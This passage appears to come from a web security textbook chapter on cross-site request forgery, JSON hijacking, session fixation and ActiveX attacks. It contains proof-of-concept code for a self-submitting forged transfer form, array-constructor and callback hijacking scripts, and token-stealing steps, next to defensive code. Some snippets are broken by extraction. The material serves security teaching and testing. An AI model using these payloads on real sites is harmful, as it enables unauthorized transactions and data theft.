Note that HTML-encoding these characters is not an effective defense

against OSRF attacks, because browsers will decode the target URL string

before it is requested.

Depending on the insertion point and the surrounding context, it may also

be possible to prevent OSRF attacks using the same defenses described in the

next section for XSRF attacks.

Cross-Site Request Forgery

Cross-site request forgery (XSRF) involves a similar delivery mechanism to the

frame injection attack described earlier. However, XSRF does not involve the

attacker presenting any spoofed content to the user. Rather, the attacker creates

an innocuous-looking web site that causes the user’s browser to submit a

request directly to the vulnerable application, to perform some unintended

action that is beneficial to the attacker.


Recall that the browser’s same origin policy does not prohibit one web site

from issuing requests to a different domain. It does, however, prevent the orig-

inating web site from processing the responses to cross-domain requests.

Hence, unlike their on-site counterparts, XSRF attacks are “one-way” only. It

would not be possible to perform the multistage actions of the Samy worm in

a pure XSRF attack.

One well-known example of an XSRF flaw was found in the eBay applica-

tion by Dave Armstrong in 2004. It was possible to craft a URL that caused the

requesting user to make an arbitrary bid on an auction item. A third-party web

site could cause visitors to request this URL, so that any eBay user who visited

the web site would place a bid. Further, with a little work, it was possible to

exploit the vulnerability in a stored OSRF attack within the eBay application

itself. The application allowed users to place

<img> tags within auction

descriptions. To defend against attacks, the application validated that the tar-

get of the tag returned an actual image file. However, it was possible to place

a link to an off-site server that returned a legitimate image at the time the auc-

tion item was created, and subsequently replace this image with an HTTP redi-

rect back to the crafted XSRF URL. Thus, anyone who viewed the auction item

would unwittingly place a bid on it. More details can be found in the original

Bugtraq post:

http://archive.cert.uni-stuttgart.de/bugtraq/2005/04/msg00279.html

NOTE The defect in the application’s validation of off-site images is known as

a “time of check, time of use” (TOCTOU) flaw, because an item is validated at

one time and used at another time, and an attacker can modify its value in the

window between these.

Exploiting XSRF Flaws

XSRF vulnerabilities primarily arise where HTTP cookies are used to transmit

session tokens. Once an application has set a cookie in a user’s browser, their

browser will automatically submit that cookie back to the application in every

subsequent request. This is so regardless of whether the request originates

from a link provided by the application itself or from a URL received from

elsewhere, such as in an email or on another web site altogether, or from any

other source. If the application does not take precautions against misuse of the

token in this way, then it is vulnerable to XSRF.


HACK STEPS

■ Review the key functionality within the application, as enumerated in

your application mapping exercises (see Chapter 4).

■ Find an application function that (a) can be used to perform some sensi-

tive action on behalf of an unwitting user and (b) employs request para-

meters which an attacker can fully determine in advance — that is, which

do not contain any session tokens or other unpredictable items. For

example:

POST /TransferFunds.asp HTTP/1.1

Host: wahh-app.com

FromAccount=current&ToSortCode=123456&ToAccountNumber=12345678&Amount=1000.00&When=now

■ Create an HTML page that will issue the desired request without any user

interaction. For GET requests, you can place an <img> tag with the src

parameter set to the vulnerable URL. For POST requests, you can create a

form that contains hidden fields for all of the relevant parameters

required for the attack and has its target set to the vulnerable URL. You

can use JavaScript to auto-submit the form as soon as the page loads.

■ While logged in to the application, use the same browser to load your

crafted HTML page. Verify that the desired action is carried out within the

application.
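The page-building step above can be sketched as a small generator that turns a known set of POST parameters into a self-submitting form, for use against an application you are authorized to test. The helper names escapeAttr and buildPostPoc are assumptions, as is the https scheme in the sample URL (the example request shows only the Host header).

```javascript
// Escape a value for use inside a double-quoted HTML attribute.
function escapeAttr(value) {
  return String(value)
    .replace(/&/g, "&amp;")
    .replace(/"/g, "&quot;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;");
}

// Build a page whose only form is submitted as soon as the page loads.
function buildPostPoc(actionUrl, params) {
  const fields = Object.entries(params)
    .map(([name, value]) =>
      `  <input type="hidden" name="${escapeAttr(name)}" value="${escapeAttr(value)}">`)
    .join("\n");
  return [
    "<html>",
    '<body onload="document.forms[0].submit()">',
    `<form action="${escapeAttr(actionUrl)}" method="POST">`,
    fields,
    "</form>",
    "</body>",
    "</html>",
  ].join("\n");
}

// Parameters taken from the funds transfer example; the scheme is assumed.
const poc = buildPostPoc("https://wahh-app.com/TransferFunds.asp", {
  FromAccount: "current",
  ToSortCode: "123456",
  ToAccountNumber: "12345678",
  Amount: "1000.00",
  When: "now",
});
console.log(poc);
```

For a GET request the equivalent page needs nothing more than an <img> tag whose src is the vulnerable URL.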

Preventing XSRF Flaws

XSRF vulnerabilities arise because of the way browsers automatically submit

cookies back to the issuing web server with each subsequent request. If a web

application relies solely upon HTTP cookies as its mechanism for transmitting

session tokens, then it is inherently at risk from this type of attack.

XSRF attacks can be prevented by not relying only upon cookies in this way.

In the most security-critical applications, such as online banks, it is usual to see

some session tokens being transmitted via hidden fields in HTML forms.

When each request is submitted, in addition to validating session cookies, the

application verifies that the correct tokens were received in the form submis-

sion. If an application behaves in this way, then an attacker will not be able to

mount an XSRF attack without already knowing the value of the tokens being

transmitted in hidden fields. To be successful, the attacker will already need to

have hijacked the user’s session, making any XSRF attack unnecessary.
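The hidden-field defense can be illustrated with a short server-side sketch for Node.js. It is not taken from any particular application: the in-memory session store and the names createSession and isRequestAuthorized are assumptions, and a real deployment would tie this into its existing session handling.

```javascript
const crypto = require("crypto");

// Illustrative in-memory store: session cookie value -> per-session form token.
const sessions = new Map();

// Called when a session is established; formToken is later embedded
// in a hidden field of every sensitive form.
function createSession() {
  const sessionId = crypto.randomBytes(16).toString("hex");
  const formToken = crypto.randomBytes(16).toString("hex");
  sessions.set(sessionId, { formToken });
  return { sessionId, formToken };
}

// A request is accepted only if the cookie identifies a session AND the
// submitted hidden field carries the token tied to that session.
function isRequestAuthorized(cookieSessionId, submittedToken) {
  const session = sessions.get(cookieSessionId);
  if (!session || typeof submittedToken !== "string") return false;
  const expected = Buffer.from(session.formToken);
  const actual = Buffer.from(submittedToken);
  // timingSafeEqual throws on unequal lengths, so compare lengths first.
  if (expected.length !== actual.length) return false;
  return crypto.timingSafeEqual(expected, actual);
}

const s = createSession();
console.log(isRequestAuthorized(s.sessionId, s.formToken)); // legitimate form post
console.log(isRequestAuthorized(s.sessionId, undefined));   // forged request: cookie only
```

A forged cross-site request carries the cookie automatically but cannot supply the token, so it fails the second check.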

Do not make the mistake of relying upon the HTTP

Referer header to indi-

cate whether a request originated on-site or off-site. The

Referer header can be


spoofed using older versions of Flash or masked altogether using a meta

refresh tag. In general, the

Referer header is not a reliable foundation on

which to build any security defenses within web applications.

An anti-XSRF safeguard employed in some applications is to require that

users complete multiple steps in order to carry out sensitive actions such as

funds transfers. If this is done, then to be effective the application must employ

some kind of token or nonce within the multistep process. Typically, at the first

stage, the application places a token into a hidden form field, and at the second

stage, it verifies that the same token has been submitted. Because XSRF attacks

are one-way, the attacking web site cannot retrieve the token from the first

stage in order to submit it at the second. If the application uses two steps with-

out the safeguard of a token, then the defense achieves nothing because an

XSRF attack can simply issue the two required requests in turn, or (very often)

proceed directly to the second request.

Defeating Anti-XSRF Defenses via XSS

It is often said that anti-XSRF defenses can be defeated if the application contains

any XSS vulnerabilities. But this is only partly true. The thought behind this the-

ory is correct — that because XSS payloads execute on-site, they can perform

two-way interaction with the application, and so can retrieve tokens from the

application’s responses and submit them in subsequent requests. However, if a

page that is itself protected by anti-XSRF defenses also contains a reflected XSS

flaw, then this flaw cannot be used to break the defenses. Don’t forget that the ini-

tial request in a reflected XSS attack is itself cross-site. The attacker crafts a URL

or POST request containing malicious input that gets copied into the
application’s response. But if the vulnerable page implements anti-XSRF defenses, then

the attacker’s crafted request must already contain the required token in order to

succeed. If it does not, the request will be rejected and the code path containing

the reflected XSS flaw will not execute. The issue here is not about whether

injected JavaScript can read any tokens contained in the application’s response

(of course it can), but rather about getting the JavaScript into a response con-

taining those tokens in the first place.

In general, there are two situations in which XSS vulnerabilities can be

exploited to defeat anti-XSRF defenses:

■ If there are any stored XSS flaws within the defended functionality,
these can always be exploited to defeat the defenses. JavaScript injected
via the stored attack can directly read the tokens contained within the
same response that the script appears in.

■ If the application employs anti-XSRF defenses for only part of its
authenticated functionality, and a reflected XSS flaw exists in a function
that is not defended against XSRF, then that flaw can be exploited to
defeat the anti-XSRF defenses. For example, if an application employs
anti-XSRF tokens to protect only the second step of a funds transfer
function, then an attacker can leverage a reflected XSS attack elsewhere
to defeat the defense. A script injected via this flaw can make an on-site
request for the first step of the funds transfer, retrieve the token, and
use this to request the second step. The attack is successful because the
first step of the transfer, which is not defended against XSRF, returns
the token needed to access the defended page. The reliance on only
HTTP cookies to reach the first step means that it can be leveraged to
gain access to the token defending the second step.
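The token-retrieval step in the second scenario amounts to reading a hidden field out of an on-site response. The sketch below shows only that parsing step, under stated assumptions: the field name xsrfToken, the sample markup, and the helper extractHiddenField are all hypothetical, and the pattern assumes the name attribute precedes value.

```javascript
// Pull the value of a named hidden field out of an HTML response body.
function extractHiddenField(html, fieldName) {
  // Escape regex metacharacters in the field name.
  const escaped = fieldName.replace(/[.*+?^${}()|[\]\\]/g, "\\$&");
  const pattern = new RegExp(
    `<input[^>]*name=["']${escaped}["'][^>]*value=["']([^"']*)["']`, "i");
  const match = pattern.exec(html);
  return match ? match[1] : null;
}

// Hypothetical response to the undefended first step of the transfer.
const stepOne = `
<form action="/transfer/confirm" method="POST">
  <input type="hidden" name="xsrfToken" value="9f2c41d7">
  <input type="submit" value="Confirm">
</form>`;

console.log(extractHiddenField(stepOne, "xsrfToken"));
```

Because the script runs on-site, the same-origin policy lets it read this response in full, which is exactly what a cross-site attacker cannot do.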

JSON Hijacking

JSON hijacking is a special version of an XSRF attack, which in certain circum-

stances can violate the objectives of the browser’s same origin policy. It enables

a malicious web site to retrieve and process data from a different domain,

thereby circumventing the “one-way” restriction that normally applies to

XSRF.

The possibility of JSON hijacking arises because of a quirk in the same ori-

gin policy. Recall that browsers treat JavaScript as code, not data — they allow

one web site to retrieve and execute code from a different domain. When the

cross-domain code executes, it is treated as having originated from the invok-

ing web site, and executes in that context. The reason this quirk can lead to vul-

nerabilities is that many of today’s complex web applications use JavaScript

for transmission of data, in a way that was not foreseen when the same origin

policy was devised.

JSON

JSON (JavaScript Object Notation) is a simple data transfer format that can be

used to serialize arbitrary data and can be processed directly by JavaScript

interpreters. It is commonly employed in Ajax applications as an alternative to

the XML format originally used for data transmission. In a typical situation,

when a user performs an action, client-side JavaScript uses

XMLHttpRequest to

communicate the action to the server. The server returns a lightweight

response containing data in JSON format. The client-side script then processes

this data and updates the user interface accordingly.

For example, an Ajax-based web mail application may contain a panel

allowing users to tab between different data. When a user clicks the Contacts


tab, the browser uses XMLHttpRequest to retrieve the user’s personal contacts,

which are returned using JSON:

[
    [ 'Jeff', '1741024918', '[email protected]' ],
    [ 'C Gillingham', '3885193114', '[email protected]' ],
    [ 'Mike Kemp', '8041148671', '[email protected]' ],
    [ 'Wade A', '5078782513', '[email protected]' ]
]

The returned message contains valid JavaScript syntax that defines an array.

The client-side script uses the JavaScript interpreter to construct the array and

then processes its contents.

Attacks against JSON

Because JavaScript is being used to transmit data, rather than pure code, the

possibility arises for a malicious web site to exploit the same origin policy’s

handling of JavaScript and gain access to data generated by other applications.

This attack involves an XSRF request, as described previously. However, in the

present case, it may be possible for the malicious site to read the data returned

in the cross-site response, thereby performing two-way interaction with the

target application.

Of course, it is not possible for a malicious web site to simply load a script

from a different domain and view its contents. That would still violate the

same origin policy, regardless of whether the response in question contains

JavaScript or other content. Rather, the malicious web site uses a

<script> tag

to include the target script and execute it within its own page. With a bit of

work, by actually executing the included script, the malicious site can gain

access to the data it contains.

At the time of this writing, there are two known ways in which a malicious

site can perform this trick: by overriding the default array constructor or by

implementing a suitable callback function.

Overriding the Array Constructor

If the JSON data returned by the target application contains a serialized array,

the malicious web site can override the default constructor for arrays in order

to gain access to the JSON data when the array is constructed. This attack can

be performed as follows in the Firefox browser:

<script>
function capture(s) {
    alert(s);
}
function Array() {
    for (var i = 0; i < 3; i++)
        this[i] setter = capture;
}
</script>

This proof-of-concept attack performs three key actions:

■ It implements a function called capture, which simply generates an
alert displaying any data passed to it.

■ It overrides the Array object and defines the setter for the first three
elements in the array to be the capture function.

■ It includes the target JSON object within the page by setting the
relevant URL as the src attribute of a <script> tag.

When this attack is executed, the target of the <script> tag is retrieved and
executed. The serialized object, which is a multidimensional array containing

the victim user’s contacts, is constructed. When each element in the array is

set, the overridden setter is invoked, enabling the attacker’s script to capture

the contents of the element. In the example, the script simply displays a series

of alerts containing the array data.

This exact vulnerability was discovered within the GMail application by

Jeremiah Grossman in 2006. In other instances, attacks can override

Object

rather than Array, with the same effect.

Implementing a Callback Function

In some applications, the JavaScript returned by the vulnerable application

does not contain only a JSON object, but also invokes a callback function on

that object. For example:

showContacts(
[
    [ 'Jeff', '1741024918', '[email protected]' ],
    [ 'C Gillingham', '3885193114', '[email protected]' ],
    [ 'Mike Kemp', '8041148671', '[email protected]' ],
    [ 'Wade A', '5078782513', '[email protected]' ]
]);

This technique is often used in mash-ups in which one application includes

a JSON object from another domain, and specifies a call-back function in its

request for the script. The returned script invokes the specified call-back func-

tion on the JSON object, enabling the invoking application to process the data

in arbitrary ways.


Because this mechanism is specifically designed to work around the

browser’s same origin restrictions, it can of course be abused by an attacker to

capture data returned from other domains. In the example shown, an attack

simply needs to implement the

showContacts function and include the target

script. For example:

<script>
function showContacts(a) {
    alert(a);
}
</script>

showContacts”></script>

Finding JSON Hijacking Vulnerabilities

Because JSON hijacking is a species of cross-site request forgery, some

instances of it can be identified using the same methodology as was described

for XSRF. However, because JSON hijacking allows you to retrieve arbitrary

data from another domain, and not only perform cross-domain actions, you

are interested in a different range of functionality than you are when probing

for standard XSRF flaws.

HACK STEPS

■ If the application uses Ajax, look for any instances where a response

contains sensitive data in JSON format or other JavaScript.

■ As with standard XSRF, determine whether it is possible to construct a

cross-domain request to retrieve the data. If the request does not contain

any unpredictable parameters, then the application may be vulnerable.

■ JSON hijacking attacks can only be performed using the GET method,

because this is the method used when a URL specified in a <script>

include is retrieved. If the application’s own request uses the POST

method, determine whether the request is still accepted when you

change the method to GET and move the body parameters to the URL

query string.

■ If the preceding requirements are met, determine whether you can con-

struct a web page that will succeed in gaining access to the target appli-

cation’s response data, by including it via a <script> tag. Try the two

techniques described, or any others that may be appropriate in unusual

situations.
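The method-switching check in the steps above can be prepared with a small helper that rewrites a form-encoded POST as the equivalent GET URL. This is a sketch only: the function name postToGetUrl, the endpoint, and the parameters are hypothetical.

```javascript
// Rewrite a form-encoded POST as the equivalent GET URL, so that you can
// test whether the application still accepts the request as a GET.
function postToGetUrl(endpointUrl, formBody) {
  const url = new URL(endpointUrl);
  const bodyParams = new URLSearchParams(formBody);
  // Append each body parameter to any query string already present.
  for (const [name, value] of bodyParams) {
    url.searchParams.append(name, value);
  }
  return url.toString();
}

// Hypothetical endpoint and parameters, for illustration only.
const getUrl = postToGetUrl(
  "https://wahh-app.com/contacts?view=all", "format=json&page=1");
console.log(getUrl);
```

If the application returns the same JSON for the rewritten URL, the request can be issued by a <script> include and is a candidate for the two techniques described.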


Preventing JSON Hijacking

As already described, there are several preconditions that must be in place

before a JSON hijacking attack can be performed. To prevent such attacks, it is

necessary to violate at least one of these preconditions.

At the time of this writing, each of the following countermeasures should be

sufficient to frustrate a JSON hijacking attack. However, research into these

attacks is thriving. To provide defense-in-depth, it is recommended that mul-

tiple precautions are implemented jointly.

■ The application should use standard anti-XSRF defenses to prevent
cross-domain requests for sensitive data. Requests for JSON objects
should include an unpredictable parameter that is verified before the
data is returned.

■ When an application retrieves JSON objects from its own domain, it is
not restricted to using <script> tags to include the objects. Because the
request is on-site, client-side code can use XMLHttpRequest to gain
unfettered access to the response data and perform additional processing
on it before it is interpreted as JavaScript. This means that the
application can insert invalid or problematic JavaScript at the start of the
response, which the client application removes before it is processed.
This is how Google prevented the attack described against GMail, by
inserting the following at the start of the returned script:

while(1);

■ Because the application can use XMLHttpRequest to retrieve JSON data,
it can use POST requests to do so. If the application accepts only POST
requests for JSON objects, it will prevent third-party sites from including
them via <script> tags.
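The prefixing countermeasure can be sketched as a matching pair of helpers. The names wrapJson and unwrapJson are assumptions, and the client side here uses JSON.parse rather than handing the text to the JavaScript interpreter, which is a substitution on our part and not something the approach requires.

```javascript
const PREFIX = "while(1);";

// Server side: a response that loops forever if executed via a <script> include.
function wrapJson(data) {
  return PREFIX + JSON.stringify(data);
}

// Client side: the text was fetched on-site (for example via XMLHttpRequest),
// so the prefix can be removed before the remainder is parsed.
function unwrapJson(responseText) {
  if (!responseText.startsWith(PREFIX)) {
    throw new Error("unexpected response format");
  }
  return JSON.parse(responseText.slice(PREFIX.length));
}

// Sample data modeled on the contacts example (email fields omitted).
const wire = wrapJson([["Jeff", "1741024918"], ["Wade A", "5078782513"]]);
console.log(wire);
console.log(unwrapJson(wire)[0][0]);
```

A third-party page that includes the response via a <script> tag has no opportunity to strip the prefix, so the array is never constructed in its context.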

Session Fixation

Session fixation vulnerabilities typically arise when an application creates an

anonymous session for each user when they first access the application. If the

application contains a login function, this anonymous session will be created

prior to login and then upgraded to an authenticated one after they have

logged in. The same token that initially confers no special access later allows

privileged access within the security context of the authenticated user.

In a standard session hijacking attack, the attacker must use some means to

capture the session token of an application user. In a session fixation attack, on

the other hand, the attacker first obtains an anonymous token directly from the


application, and uses some means to fix this token within a victim’s browser.

After the user has logged in, the attacker can use the token to hijack the user’s

session.

The steps involved in a successful session fixation attack are illustrated in
Figure 12-10.

Figure 12-10: The steps involved in a session fixation attack
(1. Attacker requests /login.php and is issued a session token;
2. Attacker feeds the session token to the user;
3. User logs in using the token received from the attacker;
4. Attacker hijacks user’s session using the same token as the user)

The key stage in this attack is of course the point at which the attacker feeds
to the victim the session token that he has acquired, thereby causing the
victim’s browser to use it. There are various techniques that the attacker may use
to fix a specific token for a target user, depending upon the mechanism used
by the application for transmitting session tokens. The two most common
techniques are:

■ Where an application transmits session tokens within a URL parameter,
the attacker can simply feed the victim the same URL that was issued to
him by the application, for example:

https://wahh-app.com/login.php?SessId=12d1a1f856ef224ab424c2454208

■ Where an application transmits session tokens using HTTP cookies or
hidden fields in HTML forms, the attacker can exploit a known XSS or
header injection vulnerability to set these values within the user’s
browser. In the case of cookies, this attack will succeed in hijacking the
user’s session even against applications that issue HttpOnly cookies,
and so where cookies cannot be straightforwardly captured via an XSS
attack.

In both of these cases, the same various mechanisms for delivering the

attack are available as were described previously for reflected XSS.

Session fixation vulnerabilities can also exist in applications that do not con-

tain login functionality. For example, an application may allow anonymous

users to browse a catalog of products, place items into a shopping cart, check

out by submitting personal data and payment details, and then review all of

this information on a Confirm Order page. In this situation, an attacker may fix

an anonymous session token within the browser of a victim, wait for that user to

place an order and submit sensitive information, and then access the Confirm

Order page using the token, to capture the user’s details.

Some web applications and web servers accept arbitrary tokens submitted

by users, even if these were not previously issued by the server itself. When an

unrecognized token is received, the server simply creates a new session for the

token, and handles it exactly as if it were a new token generated by the server.

Microsoft IIS and Allaire ColdFusion servers have been vulnerable to this

weakness in the past.

When an application or server behaves in this way, attacks based on session

fixation are made considerably easier because the attacker does not need to

take any steps to ensure that the tokens fixed in target users’ browsers are cur-

rently valid. The attacker can simply choose an arbitrary token, distribute this

as widely as possible (for example, by emailing a URL containing the token to

individual users, mailing lists, etc.), and then periodically poll a protected

page within the application (for example, My Details) to detect when a victim

has used the token to log in. Even if a targeted user does not follow the URL

for several months, a determined attacker may still be able to hijack their session.

Finding and Exploiting Session Fixation Vulnerabilities

If the application supports authentication, you should review how it handles

session tokens in relation to the login. There are two ways in which the appli-

cation may be vulnerable:

■ The application issues an anonymous session token to each unauthenticated
user. When the user logs in, no new token is issued; rather, their
existing session is upgraded to an authenticated session. This behavior
is common when the application uses the application server’s default
session-handling mechanism.

■ The application does not issue tokens to anonymous users, and a token
is issued only following a successful login. However, if a user accesses
the login function using an authenticated token, and logs in using different
credentials, no new token is issued; rather, the user associated
with the previously authenticated session is changed to the identity of
the second user.

In both of these cases, an attacker can obtain a valid session token (either by

simply requesting the login page or by performing a login with his own cre-

dentials) and feed this to a target user. When that user logs in using the token,

the attacker can hijack the user’s session.

HACK STEPS

■ Obtain a valid token, by whatever means the application enables you to

obtain one.

■ Access the login form and perform a login using this token.

■ If the login is successful and the application does not issue a new token,

then it is vulnerable to session fixation.

If the application does not support authentication, but does allow users to

submit and then review sensitive information, you should verify whether the

same session token is used before and after the initial submission of user-spe-

cific information. If so, then an attacker can obtain a token and feed this to a

target user. When the user submits sensitive details, the attacker can use the

token to view the user’s information.

HACK STEPS

■ Obtain a session token as a completely anonymous user, and then walk

through the process of submitting sensitive data, up until any page at

which the sensitive data is displayed back.

■ If the same token originally obtained can now be used to retrieve the

sensitive data, then the application is vulnerable to session fixation.

■ If any type of session fixation is identified, verify whether the server

accepts arbitrary tokens it has not previously issued. If so, the vulnerabil-

ity is considerably easier to exploit over an extended period.

Preventing Session Fixation Vulnerabilities

At any point at which a user interacting with the application transitions from

being anonymous to being identified, the application should issue a fresh session


token. This applies both to a successful login and to cases where an anonymous

user first submits personal or other sensitive information.

As a defense-in-depth measure to further protect against session fixation

attacks, many security-critical applications employ per-page tokens to supple-

ment the main session token. This technique can frustrate most kinds of ses-

sion hijacking attacks — see Chapter 7 for further details.

The application should not accept arbitrary session tokens that it does not

recognize as having issued itself. The token should be immediately canceled

within the browser, and the user should be returned to the start page of the

application.
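The two server-side rules above (issue a fresh token when the user becomes identified, and never adopt a token the server did not issue) can be sketched for Node.js as follows. The in-memory store and the function names are assumptions, and credential checking is deliberately left out.

```javascript
const crypto = require("crypto");

// Illustrative in-memory store: token -> session state.
const sessions = new Map();

function newToken() {
  return crypto.randomBytes(16).toString("hex");
}

// Issue a token to an anonymous visitor.
function startAnonymousSession() {
  const token = newToken();
  sessions.set(token, { user: null });
  return token;
}

// Tokens the server never issued are rejected, not silently adopted.
function getSession(token) {
  return sessions.get(token) || null;
}

// Called after credentials have been verified elsewhere: the pre-login
// token is invalidated and a fresh one is issued for the authenticated session.
function login(oldToken, user) {
  sessions.delete(oldToken);
  const token = newToken();
  sessions.set(token, { user });
  return token;
}

const anon = startAnonymousSession();
const auth = login(anon, "daf");
console.log(getSession(anon));            // the fixed token no longer works
console.log(getSession(auth).user);       // the fresh token carries the identity
console.log(getSession("attacker-made")); // arbitrary tokens are rejected
```

An attacker who fixed the anonymous token in the victim's browser is left holding a value that was invalidated at the moment of login.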

Attacking ActiveX Controls

We described in Chapter 5 how applications can use various thick-client tech-

nologies to distribute some of the application’s processing to the client side.

ActiveX controls are of particular interest to an attacker who is targeting other

users. When an application installs a control in order to invoke it from its own

pages, the control must be registered as “safe for scripting.” Once this has

occurred, any other web site accessed by the user can make use of that control.

Browsers do not accept just any ActiveX control that a web site requests

them to install. By default, when a web site seeks to install a control, the

browser presents a security warning and asks the user for permission. The

user can decide whether or not they trust the web site issuing the control, and

allow it to be installed accordingly. However, if they do so, and the control con-

tains any vulnerabilities, these can be exploited by any malicious web site vis-

ited by the user.

There are two main categories of vulnerability commonly found within

ActiveX controls that are of interest to an attacker:

■ Because ActiveX controls are typically written in native languages such
as C/C++, they are at risk from classic software vulnerabilities such as
buffer overflows, integer bugs, and format string flaws (see Chapter 15
for more details). In recent years, a huge number of these vulnerabilities
have been identified within the ActiveX controls issued by popular web
applications, such as online gaming sites. These vulnerabilities can
normally be exploited to cause arbitrary code execution on the computer of
the victim user.

■ Many ActiveX controls contain methods that are inherently dangerous
and vulnerable to misuse. For example:

    ■ LaunchExe(BSTR ExeName)
    ■ SaveFile(BSTR FileName, BSTR Url)
    ■ LoadLibrary(BSTR LibraryPath)
    ■ ExecuteCommand(BSTR Command)

Methods like these are usually implemented by developers in order to build

some flexibility into their control, enabling them to extend its functionality in

future without needing to deploy a fresh control altogether. However, once the

control is installed, it can of course be “extended” in the same way by any

malicious web site in order to carry out undesirable actions against the user.

Finding ActiveX Vulnerabilities

When an application installs an ActiveX control, in addition to the browser

alert asking your permission to install it, you should see code similar to the fol-

lowing within the HTML source of an application page:

<object id="oMyObject"
    classid="CLSID:A61BC839-5188-4AE9-76AF-109016FD8901"
    codebase="https://wahh-app.com/bin/myobject.cab">
</object>

This code tells the browser to instantiate an ActiveX control with the speci-

fied name and

classid, and to download the control from the specified URL.

If a control is already installed, the

codebase parameter is not required, and the

browser will locate the control from the local computer, based on its unique

classid.

If a user gives permission to install the control, then the browser registers it
as “safe for scripting.” This means that it can be instantiated, and its methods
invoked, by any web site in the future. To verify that this has been done, you
can check the registry key HKEY_CLASSES_ROOT\CLSID\{classid of control taken
from above HTML}\Implemented Categories. If the subkey
7DD95801-9882-11CF-9FA9-00AA006C42C4 is present, then the control has been
registered as “safe for scripting,” as illustrated in Figure 12-11.

Figure 12-11: A control registered as safe for scripting
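The registry check can also be scripted. The following Python sketch is illustrative only: the function names are hypothetical, the lookup assumes a Windows host (the standard-library winreg module is not available elsewhere), and it assumes that category subkeys may be stored with or without surrounding braces.

```python
SAFE_FOR_SCRIPTING_CATID = "7DD95801-9882-11CF-9FA9-00AA006C42C4"


def implemented_categories_path(classid):
    """Build the key path, relative to HKEY_CLASSES_ROOT, for a control."""
    clsid = classid.strip()
    if clsid.upper().startswith("CLSID:"):
        clsid = clsid[6:]  # drop the prefix used in the HTML classid attribute
    clsid = clsid.strip("{}")
    return "CLSID\\{" + clsid + "}\\Implemented Categories"


def is_safe_for_scripting(classid):
    """Return True if the safe-for-scripting subkey exists (Windows only)."""
    import winreg  # standard library, but only present on Windows

    path = implemented_categories_path(classid)
    try:
        with winreg.OpenKey(winreg.HKEY_CLASSES_ROOT, path) as key:
            index = 0
            while True:
                try:
                    subkey = winreg.EnumKey(key, index)
                except OSError:
                    return False  # no more subkeys, and none matched
                if subkey.strip("{}").upper() == SAFE_FOR_SCRIPTING_CATID:
                    return True
                index += 1
    except FileNotFoundError:
        return False  # control not registered, or no categories key
```

On a test machine, is_safe_for_scripting("CLSID:A61BC839-5188-4AE9-76AF-109016FD8901") would report whether the example control has been marked in this way.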


When an ActiveX control has been instantiated by the browser, individual
methods can be invoked as follows:

<script>
document.oMyObject.LaunchExe('myAppDemo.exe');
</script>

HACK STEPS

A simple way to probe for ActiveX vulnerabilities is to modify the HTML that

invokes the control, pass your own parameters to it, and monitor the results:

■ Vulnerabilities such as buffer overflows can be probed for using the
same kind of attack payloads as are described in Chapter 15. Triggering
bugs of this kind in an uncontrolled manner is most likely to result in a
crash of the browser process that is hosting the control.

■ Inherently dangerous methods such as LaunchExe can often be identi-

fied simply by their name. In other cases, the name may be innocuous or

obfuscated, but it may be clear that interesting items such as file names,

URLs, or system commands are being passed as parameters. You should

try modifying these parameters to arbitrary values and determine

whether the control processes your input as expected.

It is common to find that not all of the methods implemented by a control

are actually invoked anywhere within the application. For example, methods

may have been implemented for testing purposes, may have been superseded

but not removed, or may exist for future use or self-updating purposes. To per-

form a comprehensive test of a control, it is necessary to enumerate all of the

attack surface it exposes through these methods, and test all of them.

Various tools exist for enumerating and testing the methods exposed by
ActiveX controls. One useful tool is COMRaider by iDefense, which can display
all of a control’s methods and perform basic fuzz testing of each, as shown in
Figure 12-12.

Figure 12-12: COMRaider showing the methods of an ActiveX control

Preventing ActiveX Vulnerabilities

Defending compiled software components against attack is a large and complex
area, and goes beyond the scope of this book. Basically, the designers and
developers of an ActiveX control must ensure that the methods that it implements
cannot be invoked by a malicious web site to carry out undesirable actions
against a user who has installed it. For example:

■■ A security-focused source code review and penetration test should be
carried out on the control to locate vulnerabilities such as buffer overflows.

■■ The control should not expose any inherently dangerous methods that
call out to the file system or operating system using user-controllable
input. Safer alternatives are usually available with minimal extra effort.
For example, if it is considered necessary to launch external processes,
compile a list of all the external processes that may legitimately and
safely be launched, and either create a separate method to call each one
or use a single method that takes an index number into this list.
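The index-into-a-list design can be sketched briefly. The example below is written in Python for readability, whereas a real control would be native code; the program names and the launch_by_index function are hypothetical. The point it illustrates is that the caller supplies only a number, never a path or command line.

```python
import subprocess

# Hypothetical allowlist: the only programs the component may ever start.
ALLOWED_PROGRAMS = (
    ("notepad.exe",),
    ("calc.exe",),
)


def launch_by_index(index, runner=subprocess.Popen):
    """Start the allowlisted program at `index`; reject everything else."""
    if isinstance(index, bool) or not isinstance(index, int):
        raise ValueError("index must be an integer")
    if not 0 <= index < len(ALLOWED_PROGRAMS):
        raise ValueError("index is outside the allowlist")
    # The command line comes entirely from the fixed table above,
    # so nothing supplied by the invoking page reaches the operating system.
    return runner(list(ALLOWED_PROGRAMS[index]))
```

The runner parameter exists only so that the behavior can be exercised without starting a real process. Compared with a method such as LaunchExe(BSTR ExeName), the worst a malicious page can do here is start one of the programs the developer already judged to be safe.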

As an additional defense-in-depth precaution, some ActiveX controls vali-

date the domain name that issued the HTML page from which they are being

invoked. Some controls go even further than this, and require that all parame-

ters passed to the control must be cryptographically signed. If an unautho-

rized domain attempts to invoke the control, or the signature passed is invalid,

the control does not carry out the requested action. You should be aware that

some defenses of this kind can be circumvented if the web site that is permit-

ted to invoke the control contains any XSS vulnerabilities.
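The combination of a domain check and signed parameters might look roughly like the following Python sketch. It rests on several assumptions that are not taken from any particular control: the function names are hypothetical, the parameters are canonicalized by sorting and URL-encoding them, and an HMAC stands in for the signature purely to keep the example short. A deployed control would more plausibly verify a public-key signature, since a shared secret embedded in a downloadable component could be extracted.

```python
import hashlib
import hmac
from urllib.parse import urlencode


def sign_parameters(key, params):
    """Compute a hex signature over the parameters in a fixed order."""
    canonical = urlencode(sorted(params.items()))
    return hmac.new(key, canonical.encode("utf-8"), hashlib.sha256).hexdigest()


def is_request_allowed(key, origin_host, params, signature, allowed_hosts):
    """Act only for an authorized domain presenting a valid signature."""
    if origin_host.lower() not in allowed_hosts:
        return False
    expected = sign_parameters(key, params)
    # Constant-time comparison avoids leaking how many characters matched.
    return hmac.compare_digest(expected.encode("utf-8"),
                               signature.encode("utf-8"))
```

Note that a check of this kind says nothing about how the authorized page came to issue the call. If that page is vulnerable to XSS, an attacker’s script runs in the permitted domain and may be able to replay parameters that the application has already signed.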


Local Privacy Attacks

Many users access web applications from a shared environment in which an

attacker may have direct access to the same computer as the user. This gives

